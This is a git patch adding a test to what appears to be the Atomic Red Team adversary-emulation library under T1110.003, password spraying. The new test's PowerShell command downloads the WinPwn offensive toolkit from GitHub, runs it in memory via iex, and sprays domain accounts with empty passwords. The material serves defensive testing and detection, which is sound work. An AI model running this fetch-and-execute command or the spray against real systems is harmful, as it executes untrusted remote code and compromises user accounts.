From 3b9b4be1afdb809f169698123ad8a90a88f190c5 Mon Sep 17 00:00:00 2001
From: tlor89 <60741301+tlor89@users.noreply.github.com>
Date: Thu, 12 May 2022 18:50:49 -0500
Subject: [PATCH] Update T1110.003.yaml (#1952)

DomainPasswordSpray Attacks technique via function of WinPwn

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1110.003/T1110.003.yaml | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml
index 87fdcf78..0f1e053e 100644
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
@@ -157,3 +157,13 @@ atomic_tests:
         }
       }
       Write-Host "End of password spraying"
+- name: WinPwn - DomainPasswordSpray Attacks
+  description: DomainPasswordSpray Attacks technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      domainpassspray -consoleoutput -noninteractive -emptypasswords
+    name: powershell